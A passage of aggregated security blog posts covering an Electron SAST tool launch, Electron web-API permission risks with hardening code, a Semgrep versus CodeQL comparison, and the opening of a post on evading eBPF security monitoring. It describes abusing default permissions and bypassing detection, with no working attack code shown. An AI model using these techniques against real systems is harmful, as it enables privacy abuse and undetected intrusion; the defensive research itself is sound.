  • Is able to learn from his/her mistakes
  • Has motivation to work/study and show initiative
  • Must be communicative (without this it is difficult to teach effectively)
  • Brings something to the mix (e.g., creativity, academic knowledge, etc.)

My experience before the internship consisted mostly of bug bounty hunting and CTFs. There are not many other opportunities for college students with zero experience, so I had spent nearly two years bug hunting part-time before the internship. I also had the OSWE certification to demonstrate capability for source code review, but this is definitely not required (they’ll test you anyway!). Simply being an active participant in CTFs with a focus on web security and code review may be enough experience. You may also have some other way of learning about web security if you don’t usually participate in CTFs.

Final Thoughts

I enjoyed my internship at Doyensec. There was a good balance between learning and responsibility that has prepared me to work in an application security role at Doyensec or elsewhere.

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Fall Internship 2022.

ElectroNG, our premium SAST tool released!

5 September 2022 at 22:00

As promised in November 2021 at Hack In The Box #CyberWeek event in Abu Dhabi, we’re excited to announce that ElectroNG is now available for purchase at https://get-electrong.com/.

ElectronNG UI

Our premium SAST tool for Electron applications is the result of many years of applied R&D! Doyensec has been the leader in Electron security since being the first security company to publish a comprehensive security overview of the Electron framework during BlackHat USA 2017. Since then, we have reported dozens of vulnerabilities in the framework itself and popular Electron-based applications.

A bit of history

We launched Electronegativity OSS at the beginning of 2019 as a set of scripts to aid the manual auditing of Electron apps. Since then, we’ve released numerous updates, educated developers on security best practices, and grown a strong community around Electron application security. Electronegativity is even mentioned in the official security documentation of the framework.

At the same time, Electron has established itself as the framework of choice for developing multi-OS desktop applications. It is now used by over a thousand public desktop applications and many more internal tools and custom utilities. Major tech companies are betting on this technology by devoting significant resources to it, and it is now evident that Electron is here to stay.

What’s new?

Considering the evolution of the framework and emerging threats, we had quickly realized that Electronegativity was in need of a significant refresh, in terms of detection and features, to be able to help modern companies in “building with security”.

At the end of 2020, we sat down to create a project roadmap and created a development team to work on what is now ElectroNG. In this blog post, we will highlight some of the major improvements over the OSS version. There is much more under the hood, and we will be covering more features in future posts and presentations.

ElectronNG UI

User Interface

If you’ve ever used Electronegativity, it would be obvious that ElectroNG is no longer a command-line tool. Instead, we’ve built a modern desktop app (using Electron!).


Better Detection, More Checks

ElectroNG features a new decision mechanism to flag security issues based on improved HTML/JavaScript/Typescript parsing and new heuristics. After developing that, we improved all existing atomic and conditional checks to reduce the number of false positives and improve accuracy. There are now over 50 checks to detect misconfigurations and security vulnerabilities!

However, the most significant improvement revolves around the creation of Electron-dependent checks. ElectroNG will attempt to determine the specific version of the framework in use by the application and dynamically adjust the scan results based on that. Considering that Electron APIs and options change very frequently, this boosts the tool’s reliability in determining things that matter.

To provide a concrete example to the reader, let’s consider a lesser-known setting named affinity. Electron v2 introduced a new BrowserView/BrowserWindow webPreferences option for gathering several windows into a single process. When specified, web pages loaded by BrowserView/BrowserWindow instances with the same affinity will run in the same renderer process. While this setting was meant to improve performance, it leads to unexpected results across different Electron versions.

Let’s consider the following code snippet:

function createWindow () {
  // Create the browser window.
  firstWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: true,
      affinity: "secPrefs"
    }
  })

  secondWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: false,
      affinity: "secPrefs"
    }
  })

  firstWin.loadFile('index.html')
  secondWin.loadFile('index.html')

Looking at the nodeIntegration setting defined by the two webPreferences definitions, one might expect the first BrowserWindow to have access to Node.js primitives while the second one to be isolated. This is not always the case and this inconsistency might leave an insecure BrowserWindow open to attackers.

The results across different Electron versions are surprising to say the least:

Affinity Diff By Versions

The affinity option has been fully deprecated in v14 as part of the Electron maintainers’ plan to more closely align with Chromium’s process model for security, performance, and maintainability. This example demonstrates two important things around renderers’ settings:

  • The specific Electron in use determines which webPreferences are applicable and which aren’t
  • The semantic and security implications of some webPreferences change based on the specific version of the framework

Terms and Price

ElectroNG is available for online purchase at $688/year per user. Visit https://get-electrong.com/buy.html.

The license does not limit the number of projects, scans, or even installations as long as the software is installed on machines owned by a single individual person. If you’re a consultant, you can run ElectroNg for any number of applications, as long as you are running it and not your colleagues or clients. For bulk orders (over 50 licenses), contact us!

Electronegativity & ElectroNG

With the advent of ElectroNG, we have already received emails asking about the future of Electronegativity.

Electronegativity & ElectroNG will coexist. Doyensec will continue to support the OSS project as we have done for the past years. As usual, we look forward to external contributions in the form of pull requests, issues, and documentation.

ElectroNG’s development focus will be towards features that are important for the paid customers with the ultimate goal of providing an effective and easy-to-use security scanner for Electron apps. Having a team behind this new project will also bring innovation to Electronegativity since bug fixes and features that are applicable to the OSS version will be also ported.

As successfully done in the past by other projects, we hope that the coexistence of a free community and paid versions of the tool will give users the flexibility to pick whatever fits best. Whether you’re an individual developer, a small consulting boutique, or a big enterprise, we believe that Electronegativity & ElectroNG can help eradicate security vulnerabilities from your Electron-based applications.

Diving Into Electron Web API Permissions

26 September 2022 at 22:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Chrome Permission Prompt

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation between these three is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application would not have the capability to deny access to video without also denying access to audio. For those wondering, modern Electron apps seemingly handling microphone & video permissions separately, are only tracking and respecting the user choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible for media devices to be enumerated even when permission has not been granted. In Chrome however, an origin can only see devices that it has permission to use. The API navigator.mediaDevices.enumerateDevices() will return all of the user’s media devices, which can be used to fingerprint the user’s devices. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

navigator.mediaDevices.enumerateDevices()

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.

File System Access API

The File System Access API normally allows access to read and write to local files. In Electron, reading files has been implemented but writing to files has not been implemented and permission to write to files is always denied. However, access to read files is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, Chrome notifies you that you are granting access to a specific file or directory until all tabs of that site are closed. In addition, Chrome prevents access to directories or files that are deemed too sensitive to disclose to a site. These are both considerations mentioned in the API’s standard (discussed by the WICG).

  • “User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory
Chrome's prompt: Let site view files?
  • “User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files. In Electron, there is no such notification or prevention. A user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website. There will be no notification alerting the user of the level of access they will be granting.

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

Cliboard Reading Callback
Cliboard Reading Callback

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

PoC for Notification API Attack

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

Idle Detection API abuse

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Local Font Access API abuse

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

ElectroNG Permission Check

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.

Comparing Semgrep and CodeQL

5 October 2022 at 22:00

Introduction

Recently, a client of ours asked us to put R2c’s Semgrep in a head-to-head test with GitHub’s CodeQL. Semgrep is open source and free (with premium options). CodeQL “is free for research and open source” projects and accepts open source contributions to its libraries and queries, but is not free for most companies. Many of our engineers had already been using Semgrep frequently, so we were reasonably familiar with it. On the other hand, CodeQL hadn’t gained much traction for our internal purposes given the strict licensing around consulting. That said, our client’s use case is not the same as ours, so what works for us, may not work well for them. We have decided to share our results here.

SAST background

A SAST tool generally consists of a few components 1) a lexer/parser to make sense of the language, 2) rules which process the output produced by the lexer/parser to find vulnerabilities and 3) tools to manage the output from the rules (tracking/ticketing, vulnerability classification, explanation text, prioritization, scheduling, third-party integrations, etc).

Difficulties in evaluating SAST tools

The rules are usually the source of most SAST complaints because ultimately, we all hope ideally that the tool produces perfect results, but that’s unrealistic. On one hand, you might get a tool that doesn’t find the bug you know is in the code (a false negative - FN) or on the other, it might return a bunch of useless supposed findings that are either lacking any real impact or potentially just plain wrong (a false positive - FP). This leads to our first issue when attempting to quantitatively measure how good a SAST tool is - what defines true/false or positives/negatives?

Some engineers might say a true positive is a demonstrably exploitable condition, while others would say matching the vulnerable pattern is all that matters, regardless of the broader context. Things are even more complicated for applications that incorporate vulnerable code patterns by design. For example, systems administration applications which executes shell commands, via parameters passed in a web request. In most environments, this is the worst possible scenario. However, for these types of apps, it’s their primary purpose. In those cases, engineers are then left with the subjective question of whether to classify a finding as a true or false positive where an application’s users can execute arbitrary code in an application, that they’d need to be fully and properly authenticated and authorized to do.

These types of issues come from asking too much of the SAST application and we should focus on locating vulnerable code patterns - leaving it to people to vet and sort the findings. This is one of the places where the third set of components comes into play and can be a real differentiator between SAST applications. How users can ignore the same finding class(es), findings on the same code, findings on certain paths, or conditionally ignoring things, becomes very important to filter the signal from the noise. Typically, these tools become more useful for organizations that are willing to commit the time to configure the scans properly and refine the results, rather than spending it triaging a bunch of issues they didn’t want to see in the first place and becoming frustrated.

Furthermore, quantitative comparisons between tools can be problematic for several reasons. For example, if tool A finds numerous low severity bugs, but misses a high severity one, while tool B finds only a high severity bug, but misses all the low severity ones, which is a better tool? Numerically, tool A would score better, but most organizations would rather find the higher severity vulnerability. If tool A finds one high severity vulnerability and B finds a different one, but not the one A finds, what does it mean? Some of these questions can be handled with statistical methods, but most people don’t usually take this approach. Additionally, issues can come up when you’re in a multi-language environment where a tool works great on one language and not so great on the others. Yet another twist might be if a tool missed a vulnerability that was due to a parsing error, that would certainly be fixed in a later release, rather than a rules matching issue specifically.

These types of concerns don’t necessarily have easy answers and it’s important to remember that any evaluation of a SAST tool is subject to variations based on the language(s) being examined, which rules are configured to run, the code repository’s structure and contents, and any customizations applied to the rules or tool configuration.

Another hurdle in properly evaluating a SAST tool is finding a body of code on which to test it. If the objective is to simply scan the code and verify whether the findings are true positives (TP) or false positives (FP), virtually any supported code could work, but finding true negatives (TN) and false negatives (FN) require prior knowledge of the security state of the code or having the code manually reviewed.

This then raises the question of how to quantify the negatives that a SAST tool can realistically discover. Broadly, a true positive is either a connection of a source and unprotected sink or possibly a stand-alone configuration (e.g., disabling a security feature). So how do we count true negatives specifically? Do we count the total number or sources that lead to a protected sink, the total of protected sinks, the total safe function calls (regardless if they are identified sinks), and all the safe configuration options? Of course, if the objective is solely to verify the relative quality of detection between competing software, simply comparing the results, provided all things were reasonably equal, can be sufficient.

Semgrep VS CodeQL

Our testing methodology

We utilized the OWASP Benchmark Project to analyze pre-classified Java application code to provide a more accurate head-to-head comparison of Semgrep vs. CodeQL. While we encountered a few bugs running the tools, we were able to work around them and produce a working test and meaningful results.

Both CodeQL and Semgrep came with sample code used to demonstrate the tool’s capabilities. We used the test suite of sample vulnerabilities from each tool to test the other, swapping the tested files “cross-tool”. This was done with the assumption that the test suite for each tool should return 100% accurate results for the original tool, by design, but not necessarily for the other. Some modifications and omissions were necessary however, due to the organization and structure of the test files.

We also ran the tools against a version of our client’s code in the manner that required the least amount of configuration and/or knowledge of the tools. This was intended to show what you get “out of the box” for each tool. We iterated over several configurations of the tools and their rules, until we came to a meaningful, yet manageable set of results (due to time constraints).

Assigning importance

When comparing SAST tools, based on past experience, we feel these criteria are important aspects that need to be examined.

  • Language and framework support
  • Lexer/Parser functionality
  • Pre/post scan options (exclusions, disabling checks, filtering, etc.)
  • Rules
  • Findings workflows (internal tracking, ticket system integration, etc.)
  • Scan times

Language and framework support

The images below outline the supported languages for each tool, refer to the source links for additional information about the supported frameworks:

Semgrep:
Semgrep results

Source: https://semgrep.dev/docs/supported-languages/

CodeQL:
CodeQL results

Source: https://codeql.github.com/docs/codeql-overview/supported-languages-and-frameworks/

Not surprisingly, we see support for many of the most popular languages in both tools, but a larger number, both in GA and under development in Semgrep. Generally speaking, this gives an edge to Semgrep, but practically speaking, most organizations only care if it supports the language(s) they need to scan.

Lexer/Parser functionality

Lexer/parser performance will vary based on the language and framework, their versions and code complexity. It is only possible to get a general sense of this by scanning numerous repositories and monitoring for errors or examining the source of the parser and tool.

During testing on various applications, both tools encountered errors allowing only the partial parsing of many files. The thoroughness of the parsing results varied depending on the tool and on the code being analyzed. Testing our client’s Golang project, we did occasionally encounter parsing errors with both as well.

Semgrep:

We encountered an issue when testing against third-party code where a custom function (exit()) was declared and used, despite being reserved, causing the parser to fail once the function was reached, due to invalid syntax. The two notable things here are that the code should theoretically not work properly and that despite this, Semgrep was still able to perform a partial examination. Semgrep excelled in terms of the ability to handle incomplete code or code with errors as it operates on a single file scope generally.

CodeQL:

CodeQL works a bit differently, in that it effectively creates a database from the code, allowing you to then write queries against that database to locate vulnerabilities. In order for it to do this, it requires a fully buildable application. This inherently means that it must be more strict with its ability to parse all the code.

In our testing, CodeQL generated errors on the majority of files that it had findings for (partial parsing at best), and almost none were analyzed without errors. Roughly 85% of files generated some errors during database creation.

According to CodeQL, a small number of extraction errors is normal, but a large number is not. It was unclear how to reduce the large number of extraction errors. According to CodeQL’s documentation, the only ways were to wait for CodeQL to release a fixed version of the extractor or to debug using the logs. We attempted to debug with the logs, but the error messages were not completely clear and it seemed that the two most common errors were related to the package names declared at the top of the files and variables being re-declared. It was not completely clear if these errors were due to an overly strict extractor or if the code being tested was incomplete.

Semgrep would seem to have the advantage here, but it’s not a completely fair comparison, due to the different modes of operation.

Pre/post scan options

Semgrep:

Among the options you can select when firing up a Semgrep scan are:

  • Choosing which rules, or groups of rules, to run, or allowing automatic selection
    • Semgrep registry rules (remote community and r2c created; currently 973 rules)
    • Local custom rules and/or “ephemeral” rules passed as an argument on the command line
    • A combination of the above
  • Choosing which languages to examine
  • A robust set of filtering options to include/exclude files, directories and specific content
  • Ability to configure a comparison baseline (find things not already in commit X)
  • Whether to continue if errors or vulnerabilities are encountered
  • Whether to automatically perform fixes by replacing text and whether to perform dry runs to check before actually changing
  • The maximum size of the files to scan
  • Output formats

Notes:

  1. While the tool does provide an automated scanning option, we found situations in which -–config auto did not find all the vulnerabilities that manually selecting the language did.

  2. The re-use/tracking of the scan results requires using Semgrep CI or Semgrep App.

CodeQL:

CodeQL requires a buildable application (i.e., no processing of a limited set of files), with a completely different concept of “scanning”, so this notion doesn’t directly translate. In effect, you create a database from the code, which you subsequently query to find bugs, so much of the “filtering” can be accomplished by modifying the queries that are run.

Options include:

  • Specifying which language(s) to process
    • The CodeQL repository contains libraries and specific queries for each language
    • The Security folder contains (21) queries for various CWEs
  • Which queries to run
  • Location of the files
  • When the queries are run on the resulting database you can specify the output format
  • Adjustable verbosity when creating the database(s)

Because CodeQL creates a searchable database, you can indefinitely run queries against the scanned version of the code.

Because of the different approaches it is difficult to say one tool has an advantage over the other. The most significant difference is probably that Semgrep allows you to automatically fix vulnerabilities.

Rules

As mentioned previously, these tools take completely different approaches (i.e., rules vs queries). Whether someone prefers writing queries vs. YAML is subjective, so we’ll not discuss the formats themselves specifically.

Semgrep:

As primarily a string-matching static code analysis tool, Semgrep’s accuracy is mostly driven by the rules in use and their modes of operation. Semgrep is probably best thought of as an improvement on the Linux command line tool grep. It adds improved ease of use, multi-line support, metavariables and taint tracking, as well as other features that grep directly does not support. Beta features also include the ability to track across related files.

Semgrep rules are defined in relatively simple YAML files with only a handful of elements used to create them. This allows someone to become reasonably proficient with the tool in a matter of hours, after reading the documentation and tutorials. At times, the tool’s less than full comprehension of the code can cause rule writing to be more difficult than it might appear at first glance.

In Semgrep, there are several ways to execute rules, either locally or remotely. Additionally, you can pass them as command line arguments referred to as “ephemeral” rules, eliminating the YAML files altogether.

The rule below shows an example of a reasonably straightforward rule. It effectively looks for an insecure comparison of something that might be a secret within an HTTP request.

rules:
  - id: insecure-comparison-taint
    message: >-
      User input appears to be compared in an insecure manner that allows for side-channel timing attacks. 
    severity: ERROR
    languages: [go]
    metadata:
      category: security
    mode: taint
    pattern-sources:
      - pattern-either:
          - pattern: "($ANY : *http.Request)"
          - pattern: "($ANY : http.Request)"
    pattern-sinks:
      - patterns:
          - pattern-either: 
            - pattern: "... == $SECRET"
            - pattern: "... != $SECRET"
            - pattern: "$SECRET == ..."
            - pattern: "$SECRET != ..."
          - pattern-not: len(...) == $NUM
          #- pattern-not: <... len(...) ...>
          - metavariable-regex:
              metavariable: $SECRET
              regex: .*(secret|password|token|otp|key|signature|nonce).*

The logic in the rules is familiar and amounts to what feels like stacking of RegExs, but with the added capability of creating boundaries around what is matched against and with the benefit of language comprehension. It is important to note however that Semgrep lacks a full understanding of the code flow sufficient enough to trace source to sink flows through complex code. By default it works on a single file basis, but Beta features also include the ability to track across related files. Semgrep’s current capabilities lie somewhere between basic grep and a traditional static code analysis tool, with abstract syntax trees and control flow graphs.

No special preparation of repositories is needed before scanning can begin. The tool is fully capable of detecting languages and running simultaneous scans of multiple languages in heterogeneous code repositories. Furthermore, the tool is capable of running on code which isn’t buildable, but the tool will return errors when it parses what it deems as invalid syntax.

That said, rules tend to be more general than the queries in CodeQL and could potentially lead to more false positives. For some situations, it is not possible to make a rule that is completely accurate without customizing the rule to match a specific code base.

CodeQL:

CodeQL’s query language has a SQL-like syntax with the following features:

  • Logical: all the operations in QL are logical operations.
  • Declarative: provide the properties the results must satisfy rather than the procedure to compute the results.
  • Object-oriented: it uses classes, inheritance and other object oriented features to increase modularity and reusability of the code.
  • Read-only: no side effect, no imperative features (ex. variable assignment).

The engine has extractors for each supported language. They are used to extract the information from the codebase into the database. Multi-language code bases are analyzed one at a time. Trying to specify a list of target languages (go, javascript and c) didn’t work out of the box because CodeQL required to explicitly set the build command for this combination of languages.

CodeQL can also be used in VSCode as an extension, a CLI tool or integrated with Github workflows. The VS extension code allows writing the queries with the support of the autocompletion by the IDE and testing them against one or more databases previously created.

The query below shows how you would search for the same vulnerability as the Semgrep rule above.

/**
 * @name Insecure time comparison for sensitive information
 * @description Input appears to be compared in an insecure manner (timing attacks)
 */


import go

from EqualityTestExpr e, DataFlow::CallNode called
where
  // all the functions call where the argument matches the RegEx
  called
      .getAnArgument()
      .toString()
      .toLowerCase()
      .regexpMatch(".*(secret|password|token|otp|key|signature|nonce).*") and
  e.getAnOperand() = called.getExpr()
select called.getExpr(), "Uses a constant time comparison for sensitive information"

In order to create a database, CodeQL requires a buildable codebase. This means that an analysis consists of multiple steps: standard building of the codebase, creating the database and querying the codebase. Due to the complexity of the process in every step, our experience was that a full analysis can require a non-negligible amount of time in some cases.

Writing queries for CodeQL also requires a great amount of effort, especially at the beginning. The user should know the CodeQL syntax very well and pay attention to the structure of the condition to avoid killing the performance. We experienced an infinite compilation time just adding an OR condition in the WHERE clause of a query. Starting from zero experience with the tool, the benefits of using CodeQL are perceivable only in the long run.

Findings workflows

Semgrep:

As Semgrep allows you to output to a number of formats, along with the CLI output, there are a number of ways you can manage the findings. They also list some of this information on their manage-findings page.

CodeQL:

Because the CodeQL CLI tool reports findings in a CSV or SARIF file format, triaging findings reported by it can be quite tedious. During testing, we felt the easiest way to review findings from the CodeQL CLI tool was to launch the query from Visual Studio Code and manually review the results from there (due to the IDE’s navigation features). Ultimately, in real-world usage, the results are probably best consumed through the integration with GitHub.

Scan times

Due to the differences between their approaches, it’s difficult to fairly quantify the differences in speed between the two tools. Semgrep is a clear winner in the time it takes to setup, run a scan and get results. It doesn’t interpret the code as deeply as CodeQL does, nor does it have to create a persistent searchable database, then run queries against it. However, once the database is created, you could argue that querying for a specific bug in CodeQL versus scanning a project again in Semgrep would be roughly similar, depending on multiple factors not directly related to the tools (e.g., hardware, language, code complexity).

This highlights the fact that tool selection criteria should incorporate the use-case.

  • Scanning in a CI/CD pipeline - speed matters more
  • Ongoing periodic scans - speed matters less
  • Time based consulting work - speed is very important

OWASP Benchmark Project results

This section shows the results of using both of these SAST tools to test the same repository of Java code (the only language option). This project’s sample code had been previously reviewed and categorized, specifically to allow for benchmarking of SAST tools. Using this approach we could relatively easily run a head-to-head comparison and allow the OWASP Benchmark Project to score and graph the performance of each tool.

Drawbacks to this approach include the fact that it is one language, Java, and that is not the language of choice for our client. Additionally, SAST tool maintainers, who might be aware of this project, could theoretically ensure their tools perform well in these tests specifically, potentially masking shortcomings when used in broader contexts.

In this test, Semgrep was configured to run with the latest “security-audit” Registry ruleset, per the OWASP Benchmark Project recommendations. CodeQL was run using the “Security-and-quality queries” query suite. The CodeQL query suite includes queries from “security-extended”, plus maintainability and reliability queries.

As you can see from the charts below, Semgrep performed better, on average, than CodeQL did. Examining the rules a bit more closely, we see three CWE (Common Weakness Enumeration) areas where CodeQL does not appear to find any issues, significantly impacting the average performance. It should also be noted that CodeQL does outperform in some categories, but determining the per-category importance is left to the tool’s users.

Semgrep OWASP Benchmark Project results
CodeQL OWASP Benchmark Project results

Cross-tool test suite results

This section discusses the results of using the Semgrep tool against the test cases for CodeQL and vice versa. While initially seeming like a great way to compare the tools, unfortunately, the test case files presented several challenges to this approach. While being labeled things like “Good” and “Bad” either in file names or comments, the files were not necessarily all “Good” code or “Bad” code, but inconsistently mixed, inconsistently labeled and sometimes with multiple potential vulnerabilities in the same files. Additionally, we occasionally discovered vulnerabilities in some of the files which were not the CWE classes that were supposed to be in the files (e.g., finding XSS in an SQL Injection test case).

These issues prevented a simple count based on the files that were/were not found to have vulnerabilities. The statistics we present have been modified as much as possible in the allotted time to account for these issues and we have applied data analysis techniques to account for some of the errors.

As you can see in the table below, CodeQL performed significantly better with regards to detection, but at the cost of a higher false positive rate as well. This underscores some of the potential tradeoffs, mentioned in the introduction, which need to be considered by the consumer of the output.

Semgrep/CodeQL cross-tool results

Notes:

  1. Semgrep’s configuration was limited to only running rules classified as security-related and only against Golang files, for efficiency’s sake.

  2. Semgrep successfully identified vulnerabilities associated with CWE-327, CWE-322 and CWE-319

  3. Semgrep’s results only included two vulnerabilities which were the one intended to be found in the file (e.g., test for X find X). The remainder were HTTPs issues (CWE-319) related to servers configured for testing purposes in the CodeQL rules (e.g., test for X but find valid Y instead).

  4. CodeQL rules for SQL injection did not perform well in this case (~20% detection), but did better in cross-site scripting and other tests. There were fewer overall rules available during testing, compared to Semgrep, and vulnerability classes like Server Side Template Injection (SSTI) were not checked for, due to the absence of rules.

  5. Out of 14 files that CodeQL generated findings for, only 2 were analyzed without errors. 85% of files generated some errors during database creation.

  6. False negative rates can increase dramatically if CodeQL fails to extract data from code. It is essential to make sure that there are not excessive extraction errors when creating a database or running any of the commands that implicitly run the extractors.

Client code results

This section discusses the results of using the tools to examine an open source Golang project for one of our clients.

In these tests, due to the aforementioned lack of a priori knowledge of the code’s true security status, we are forced to assume that all files without true positives are free from vulnerabilities and are therefore considered TNs and likewise that there are no FNs. This underscores that testing against code that has already been organized for evaluation can be assumed as more accurate.

Running Semgrep with the “r2c-security-audit” configuration, resulted in 15 Golang findings, all of which were true positives. That said, the majority of the findings were related to the use of the unsafe library. Due to the nature of this issue, we opted to only count it as one finding per file, as to not further skew the results, by counting each usage within a file.

As shown in the table below, both tools performed very well! CodeQL detected significantly more findings, but it should be noted that they were largely the same couple of issues across numerous files. In other words, there were repeated code patterns in many cases, skewing the volume of findings.

Semgrep OWASP Benchmark Project results
  1. For the purposes of this exercise, TN = Total .go files - TP (890-15) = 875, since we are assuming all those files are free of vulnerabilities. For the Semgrep case, the value is irrelevant for the rate calculations, since no false positives were found.

  2. Semgrep in --config auto mode resulted in thousands of findings when run against our client’s code, as opposed to tens of findings when limiting the scans to security-specific tests on Golang only. We cite this, to underscore that results will vary greatly depending on the code tested and rules applied. That reduction in scope resulted in no false positives during manually reviewed results.

  3. For CodeQL, approximately 25% of the files were not scanned, due to issues with the tool

  4. CodeQL encountered many errors during file compilation. 63 out of 74 Go files generated errors while being extracted to CodeQL’s database. This means that the analysis was performed on less data, and most files were only partially analyzed by CodeQL. This caused the CodeQL scan to result in significantly less findings than expected.

Conclusion

Obviously there could be some bias, but if you’d like another opinion, the creators of Semgrep have also provided a comparison with CodeQL on their website, particularly in this section : “How is Semgrep different from CodeQL?”.

Not surprisingly, in the end, we still feel Semgrep is a better tool for our use as a security consultancy boutique doing high-quality manual audits. This is because we don’t always have access to all the source code that we’d need to use CodeQL, the process of setting up scans is more laborious and time consuming in CodeQL. Additionally, we can manually vet findings ourselves - so a few extra findings isn’t a major issue for us and we can use it for free. If an organization’s use-case is more aligned with our client’s - being an organization that is willing to invest the time and effort, is particularly sensitive to false positives (e.g. running a scan during CI/CD) and doesn’t mind paying for the licensing, CodeQL might be a better choice for them.

On Bypassing eBPF Security Monitoring

10 October 2022 at 22:00

There are many security solutions available today that rely on the Extended Berkeley Packet Filter (eBPF) features of the Linux kernel to monitor kernel functions. Such a paradigm shift in the latest monitoring technologies is being driven by a variety of reasons. Some of them are motivated by performance needs in an increasingly cloud-dominated world, among others. The Linux kernel always had kernel tracing capabilities such as kprobes (2.6.9), ftrace (2.6.27 and later), perf (2.6.31), or uprobes (3.5), but with BPF it’s finally possible to run kernel-level programs on events and consequently modify the state of the system, without needing to write a kernel module. This has dramatic implications for any attacker looking to compromise a system and go undetected, opening new areas of research and application. Nowadays, eBFP-based programs are used for DDoS mitigations, intrusion detection, container security, and general observability.

In 2021 Teleport introduced a new feature called Enhanced Session Recording to close some monitoring gaps in Teleport’s audit abilities. All issues reported have been promptly fixed, mitigated or documented as described in their public Q4 2021 report. Below you can see an illustration of how we managed to bypass eBPF-based controls, along with some ideas on how red teams or malicious actors could evade these new intrusion detection mechanisms. These techniques can be generally applied to other targets while attempting to bypass any security monitoring solution based on eBPF:

A few words on how eBPF works


eBPF schema

Extended BPF programs are written in a high-level language and compiled into eBPF bytecode using a toolchain. A user mode application loads the bytecode into the kernel using the bpf() syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical — eBPF exposes a path for unprivileged users to execute in ring 0. Since allowing unprivileged users to run code in the kernel is a ripe attack surface, several pieces of research in the past focused on local privilege exploitations (LPE), which we won’t cover in this blog post. After the program is loaded, the user mode application attaches the program to a hook point that will trigger the execution when a certain hook point (event) is hit (occurs). The program can also be JIT compiled into native assembly instructions in some cases. User mode applications can interact with, and get data from, the eBPF program running in the kernel using eBPF maps and eBPF helper functions.

Common shortcomings & potential bypasses (here be dragons)

1. Understand which events are caught

While eBPF is fast (much faster than auditd), there are plenty of interesting areas that can’t be reasonably instrumented with BPF due to performance reasons. Depending on what the security monitoring solution wants to protect the most (e.g., network communication vs executions vs filesystem operations), there could be areas where excessive probing could lead to a performance overhead pushing the development team to ignore them. This depends on how the endpoint agent is designed and implemented, so carefully auditing the code security of the eBPF program is paramount.

1.1 Execution bypasses

